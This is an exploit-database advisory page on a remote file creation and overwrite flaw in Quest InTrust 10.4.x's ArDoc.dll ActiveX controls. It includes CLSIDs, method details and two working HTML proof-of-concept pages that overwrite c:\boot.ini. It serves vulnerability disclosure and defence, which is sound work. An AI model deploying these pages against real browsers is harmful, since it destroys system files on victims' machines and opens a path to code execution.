header-logo
Suggest Exploit
vendor:
InTrust
by:
7.5
CVSS
HIGH
ArDoc.dll ActiveX Control Remote File Creation / Overwrite
CWE
Product Name: InTrust
Affected Version From: Quest InTrust 10.4.x
Affected Version To: Not specified
Patch Exists: NO
Related CWE:
CPE: a:quest:intrust:10.4
Metasploit:
Other Scripts:
Platforms Tested: Windows, Unix, Linux

Quest InTrust 10.4.x ReportTree and SimpleTree Classes ArDoc.dll ActiveX Control Remote File Creation / Overwrite

The Quest InTrust 10.4.x ReportTree and SimpleTree classes in ArDoc.dll ActiveX Control allow arbitrary file creation and overwrite through the SaveToFile method. This vulnerability can be exploited to remotely execute code if the attacker can control the file content.

Mitigation:

It is recommended to update to a patched version of the software or disable the affected ActiveX control.
Source

Exploit-DB raw data:

Quest InTrust 10.4.x ReportTree and SimpleTree Classes
ArDoc.dll ActiveX Control Remote File Creation / Overwrite

homepage: http://www.quest.com/intrust/

description: "InTrust securely collects, stores, reports and 
alerts on event log data from Windows, Unix and Linux systems, 
helping you comply with external regulations, internal policies 
and security best practices."


download url of a test version:
http://www.quest.com/downloads/

file tested: Quest_InTrust---Full-Package_104.zip

Background:

The mentioned product, when installed, registers two classes
with the following settings:

binary path: C:\Program Files\Common Files\Aelita Shared\ARDoc.dll
CLSID: {C6FAAD6A-68AE-452B-9F7A-9293408F51EF}
ProgID: ARDOC.ReportTree.1
Implements IObjectSafety: yes
Safe For Scripting (IObjectSafety): True
Safe For Initialization (IObjectSafety): ?

binary path: C:\Program Files\Common Files\Aelita Shared\ARDoc.dll
CLSID: {EB5920E8-F6FA-4080-ADDC-AA03FA23E2AB}
ProgID: ARDOC.SimpleTree.1
Implements IObjectSafety: yes
Safe For Scripting (IObjectSafety): True
Safe For Initialization (IObjectSafety): ?

According to IObjectSafety interface, this control is safe
for scripting then Internet Explorer will allow scripting
of this control.

Vulnerability:
both classes expose insecure methods (read/write):


...
/* DISPID=34 */
/* VT_BOOL [11] */
function LoadFromFile(
        /* VT_BSTR [8]  */ $bstrFileName
        )
{
        /* method LoadFromFile */
}
/* DISPID=35 */
/* VT_BOOL [11] */
function SaveToFile(
        /* VT_BSTR [8]  */ $bstrFileName
        )
{
        /* method SaveToFile */
}
...

SaveToFile() allows arbitrary file creation and overwrite.

The resulting file has the following header:

D0 CF 11 E0 A1 B1 1A E1 00 00 00 00 ...

This seems a Microsoft Office file.

As attachment, two pocs, overwriting the boot.ini file. Change for your needs.

Other attacks are possible, including remote code execution
if the attacker is able to control file content.
At the time of report, however, this could not be achieved. I
will post updates on this if demonstrated.



<!--
Quest InTrust 10.4.x SimpleTree Class ActiveX Control Remote File Overwrite

binary path: C:\Program Files\Common Files\Aelita Shared\ARDoc.dll
CLSID: {EB5920E8-F6FA-4080-ADDC-AA03FA23E2AB}
ProgID: ARDOC.SimpleTree.1
Implements IObjectSafety: yes
Safe For Scripting (IObjectSafety): True
Safe For Initialization (IObjectSafety): ?
-->
<!-- saved from url=(0014)about:internet -->
<html>
<object classid='clsid:EB5920E8-F6FA-4080-ADDC-AA03FA23E2AB' id='obj' WIDTH=640 height=480 />
</object>
<script>
obj.SaveToFile("c:\\boot.ini");
</script>


<!--
Quest InTrust 10.4.x ReportTree Class ActiveX Control Remote File Overwrite

binary path: C:\Program Files\Common Files\Aelita Shared\ARDoc.dll
CLSID: {C6FAAD6A-68AE-452B-9F7A-9293408F51EF}
ProgID: ARDOC.ReportTree.1
Implements IObjectSafety: yes
Safe For Scripting (IObjectSafety): True
Safe For Initialization (IObjectSafety): ?
-->
<!-- saved from url=(0014)about:internet -->
<html>
<object classid='clsid:C6FAAD6A-68AE-452B-9F7A-9293408F51EF' id='obj' />
</object>
<script>
obj.SaveToFile("c:\\boot.ini");
</script>

Navigation

Suggest Exploit

Services By CQR